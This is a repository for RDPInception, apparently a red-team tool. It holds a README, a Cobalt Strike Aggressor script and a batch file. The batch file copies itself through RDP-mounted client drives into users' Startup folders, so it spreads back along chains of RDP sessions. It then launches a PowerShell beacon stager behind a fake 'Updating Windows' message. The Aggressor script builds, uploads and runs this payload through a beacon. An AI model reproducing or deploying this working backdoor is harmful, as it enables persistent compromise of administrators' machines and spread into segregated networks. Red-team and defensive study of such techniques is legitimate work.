├── README.md ├── rdpinception.cna └── run.bat /README.md: -------------------------------------------------------------------------------- 1 | Disclaimer 2 | ========== 3 | As usual, this code and tool should not be used for malicious purposes. 4 | 5 | WARNING 6 | ======= 7 | This code is weaponised but with no damage. Do not execute it if you are not aware of the consequences or of what this code does. 8 | 9 | Credits 10 | ======= 11 | Authored by Vincent Yiu (@vysecurity) of MDSec ActiveBreach 12 | 13 | RDPInception 14 | ============ 15 | 16 | A batch script that backdoors the host that is mounting drives while RDPing into an infected machine. This process repeats along a chain of RDP hops, for example when a systems administrator goes: Laptop -> RDP -> RDP -> RDP -> RDP -> Server. 17 | 18 | The intention of this script is to allow security testers and red teamers to obtain code execution in the management network or a segregated part of the network where the target machine cannot communicate back out to the privileged network context. 19 | 20 | We have found this attack useful in some of our red team and adversary simulation engagements. 21 | 22 | 23 | Aggressor Script 24 | ================ 25 | 1) Load RDPInception 26 | 2) Run the rdpinception command 27 | 3) Select an HTTP, HTTPS or DNS beacon that can egress. 28 | 29 | Usage 30 | ===== 31 | 1) Modify the batch file to execute a PowerShell stager, EXE or even DLL. 32 | 2) Upload to the target, then execute. 
-------------------------------------------------------------------------------- /rdpinception.cna: -------------------------------------------------------------------------------- 1 | # RDPInception 2 | # 3 | # Written by Vincent Yiu @vysecurity 4 | 5 | 6 | alias rdpinception { 7 | rdpincept($1,$2); 8 | } 9 | 10 | sub rdpincept { 11 | $beacon = $1; 12 | $domain = $2; 13 | # Force select a payload 14 | openPayloadHelper(lambda({ 15 | $listener = $1; 16 | blog($beacon, "RDPIncepting listener: $listener"); 17 | $buffer = "@echo off\r\n"; 18 | 19 | $buffer = $buffer . "timeout 1 >nul 2>&1\r\n"; 20 | 21 | $buffer = $buffer . "mkdir \\\\tsclient\\c\\temp >nul 2>&1\r\n"; 22 | $buffer = $buffer . "mkdir C:\\temp >nul 2>&1\r\n"; 23 | 24 | $buffer = $buffer . "copy run.bat C:\\temp >nul 2>&1\r\n"; 25 | $buffer = $buffer . "copy run.bat \\\\tsclient\\c\\temp >nul 2>&1\r\n"; 26 | 27 | $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n"; 28 | 29 | $buffer = $buffer . "set dirs=dir /a:d /b /s C:\\users\\*Startup*\r\n"; 30 | $buffer = $buffer . "set dirs2=dir /a:d /b /s \\\\tsclient\\c\\users\\*startup*\r\n"; 31 | 32 | $buffer = $buffer . "echo|%dirs%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n"; 33 | $buffer = $buffer . "echo|%dirs2%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n"; 34 | 35 | $buffer = $buffer . "for /F \"tokens=*\" %%a in (%TEMP%\\temp_00.txt) DO (\r\n"; 36 | $buffer = $buffer . " copy run.bat \"%%a\" >nul 2>&1\r\n"; 37 | $buffer = $buffer . " copy C:\\temp\\run.bat \"%%a\" >nul 2>&1\r\n"; 38 | $buffer = $buffer . " copy \\\\tsclient\\c\\temp\\run.bat \"%%a\" >nul 2>&1\r\n"; 39 | $buffer = $buffer . ")\r\n"; 40 | 41 | $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n"; 42 | 43 | # Keying by Domain 44 | 45 | if ($domain){ 46 | $buffer = $buffer . "If \"" . $domain . "\"==\"%USERDOMAIN%\" ("; 47 | $buffer = $buffer . 
powershell($listener, false) . ")"; 48 | } 49 | else{ 50 | $buffer = $buffer . powershell($listener, false); 51 | } 52 | 53 | blog($beacon, $buffer); 54 | 55 | blog($beacon, "Infecting machine with RDPInception."); 56 | bmkdir($beacon, "C:\\temp"); 57 | bupload_raw($beacon, "C:\\temp\\run.bat", $buffer); 58 | 59 | blog($beacon, "Executing RDPInception from C:\\temp\\run.bat"); 60 | bshell($beacon, "C:\\temp\\run.bat"); 61 | 62 | }, $bids => $1)); 63 | 64 | } 65 | 66 | beacon_command_register("rdpinception", "Infects the machine with RDPInception", 67 | "Synopsis: rdpinception [DOMAIN Key]\n\n" . 68 | "Infects the machine with RDPInception, a HTTP, HTTPS or DNS payload that can egress is recommended."); -------------------------------------------------------------------------------- /run.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | echo Updating Windows ... 4 | 5 | @echo off 6 | timeout 1 >nul 2>&1 7 | 8 | mkdir \\tsclient\c\temp >nul 2>&1 9 | mkdir C:\temp >nul 2>&1 10 | 11 | copy run.bat C:\temp >nul 2>&1 12 | copy run.bat \\tsclient\c\temp >nul 2>&1 13 | 14 | del /q %TEMP%\temp_00.txt >nul 2>&1 15 | 16 | set dirs=dir /a:d /b /s C:\users\*Startup* 17 | set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup* 18 | 19 | echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt" 20 | echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt" 21 | 22 | for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO ( 23 | copy run.bat "%%a" >nul 2>&1 24 | copy C:\temp\run.bat "%%a" >nul 2>&1 25 | copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1 26 | ) 27 | 28 | del /q %TEMP%\temp_00.txt >nul 2>&1 29 | 30 | 31 | REM if "WINDOMAIN"="%USERDOMAIN%"( powershell.exe ) --------------------------------------------------------------------------------